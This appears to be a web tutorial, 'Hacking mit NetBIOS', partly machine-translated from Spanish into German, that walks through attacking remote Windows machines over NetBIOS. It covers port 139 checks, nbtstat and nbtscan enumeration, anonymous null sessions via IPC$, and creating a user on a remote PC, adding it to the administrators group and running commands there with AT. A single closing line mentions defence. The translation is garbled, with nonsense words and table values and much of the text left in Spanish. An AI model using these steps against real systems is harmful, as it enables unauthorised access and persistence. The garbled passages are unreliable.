Hacking mit NetBIOS
Auf dieser Website werden verschiedene Möglichkeiten gezeigt, alle möglichen Daten von einem entfernten PC über NetBIOS zu erhalten.
Zuerst einmal ist zu überprüfen, dass der Computer, mit dem wir eine Verbindung herstellen möchten, den NetBIOS-Port geöffnet hat, das Port ist der 139; kann man über die MSDOS-Konsole mit diesem Befehl machen: telnet IP-ADRESSE 139 und wenn er sich verbindet, wird er offen sein, andernfalls muss man einen anderen PC suchen.
Als Zweites, noch wichtiger, ist die NetBIOS-Tabelle, die uns anzeigen wird, welche Dienste auf dem entfernten Computer laufen, die wir mit den späteren Kommandos anhand der erhaltenen Ergebnisse überprüfen werden
|
Name
|
Suffix
|
Kerl
|
Dienst
|
| <Computername> |
00
|
Oder
|
Workstation-Dienst |
| <Computername> |
01
|
Oder
|
Messenger-Dienst |
| <_MSBROWSE_> |
01
|
G
|
Master-Browser |
| <Computername> |
03
|
Oder
|
Messenger-Dienst |
| <Computername> |
06
|
Oder
|
RAS-Server-Dienst |
| <Computername> |
1F
|
Oder
|
NetDDE-Dienst |
| <Computername> |
20
|
Oder
|
Dateiserver-Dienst |
| <Computername> |
21
|
Oder
|
RAS-Client-Dienst |
| <Computername> |
22
|
Oder
|
Exchange Interchange |
| <Computername> |
23
|
Oder
|
Exchange-Store |
| <Computername> |
24
|
Oder
|
Exchange-Verzeichnis |
| <Computername> |
30
|
Oder
|
Modem-Sharing-Server-Dienst |
| <Computername> |
31
|
Oder
|
Modem-Sharing-Client-Dienst |
| <Computername> |
43
|
Oder
|
SMS-Client Fernsteuerung |
| <Computername> |
44
|
Oder
|
SMS-Admin Fernsteuerungswerkzeug |
| <Computername> |
45
|
Oder
|
SMS-Client Fernchat |
| <Computername> |
46
|
Oder
|
SMS-Client Ferntransfer |
| <Computername> |
4C
|
Oder
|
DEC Pathworks TCPIP Service |
| <Computername> |
52
|
Oder
|
DEC Pathworks TCPIP Service |
| <Computername> |
87
|
Oder
|
Exchange MTA |
| <Computername> |
6An
|
Oder
|
Exchange IMC |
| <Computername> |
BE
|
Oder
|
Network Monitor Agent |
| <Computername> |
BF
|
Oder
|
Network Monitor Apps |
| <Nutzername> |
03
|
Oder
|
Messenger-Dienst |
| <Domäne> |
00
|
G
|
Domänenname |
| <Domäne> |
1B
|
Oder
|
Domain Master Browser |
| <Domäne> |
1C
|
G
|
Domain Controllers |
| <Domäne> |
1D
|
Oder
|
Master-Browser |
| <Domäne> |
1Und
|
G
|
Browser Service Elections |
| <INet~Services> |
1C
|
G
|
Internet Information Server |
| <IS~Computer_name> |
00
|
Oder
|
Internet Information Server |
Con este comando de MSDOS podremos saber que servicios corre la maquina remota: nbtstat -A DIRECCIONIP oder nbtstat -a NOMBREPC. Aparte de esto también nos dará la direccion MAC por si nos interesase.
![]() Como podremos ver en la imagen hacemos un nbtstat a una IP o nombrePC y nos da esos resultados, que los comparamos con la tabla NetBIOS y sacaremos datos jugosos como su usuario, al dominio que pertenece… y si fuese un Controlador de Dominio veriamos los servicios que corre. |
Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use DIRECCIONIPIPC$ “”/u:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.
Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA oder net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA oder net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA… Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECCIONIP y veremos el contenido via MSDOS, pero tambien puedes hacer, ANFANG > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el contenido.
Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:BUJARRA
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user username password /ADD (Ideal zum Erstellen eines Benutzers auf einem Remote-PC mit dem Befehl AT)
Einen Benutzer löschen: net user Benutzername /DELETE
Die Gruppen eines PCs anzeigen: net group
Einen Benutzer in eine Gruppe einfügen: net group namegroupusername /ADD (Ideal, um den Benutzer, den wir remote auf einem PC erstellt haben, in die Administratoren-Gruppe einzufügen)
Einen Benutzer aus einer Gruppe entfernen: net group Gruppenname Benutzername /DELETE
Befehl AT, um Dinge remote auszuführen. Mit dem Befehl at IP-ADRESSE wir sehen die geplanten Aufgaben, die sein Rechner hat, und mit dem Befehl at IP-ADRESSE 21:30 /INTERACTIVE “MS-DOS-Befehl, der auf dem Remote-PC ausgeführt wird”. Im vorherigen Befehl steht der Wert 21:30 für die Uhrzeit, die ich eingestellt habe, zu der der MS-DOS-Befehl, der in Anführungszeichen steht, ausgeführt wird, also kann man jede beliebige Uhrzeit einstellen, aber zuerst sieh besser nach, welche Uhrzeit er hat!
Das Tool des MS Windows Resource Kits nltest.rar muestra los controladores de dominio de un dominio en concreto, Beispiel:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01
Interesante sería el programa Nbtscan que lo que hace es un ‘nbtstat’ de toda una red a una velocidad impresionante.Ejemplo:
C:>nbtscan 192.168.0.0/24
 Doing NBT name scan for addresses from 192.168.0.0/24
 IP address  NetBIOS Server  Server  User  MAC address
 —————————————————————————–
 192.168.0.0  Sendto failed: Kann die angeforderte Adresse nicht zuweisen
 192.168.0.1  BUJARRA01 <Server> <unbekannt>  00-e0-7d-78-11-e6
 192.168.0.13  MARIA <Server>  MARIA  00-e0-7d-76-5a-2b
 192.168.0.55  VICETOPC <Server>  VICETO 00-00-f8-30-fa-23
 192.168.0.100  Recvfrom failed: Verbindung vom Peer zurückgesetzt
Für protegernos de este tipo de ataques debemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos el servicio de compartir carpetas e impresoras para redes microsoft (en cualquier S.O. Microsofts).









































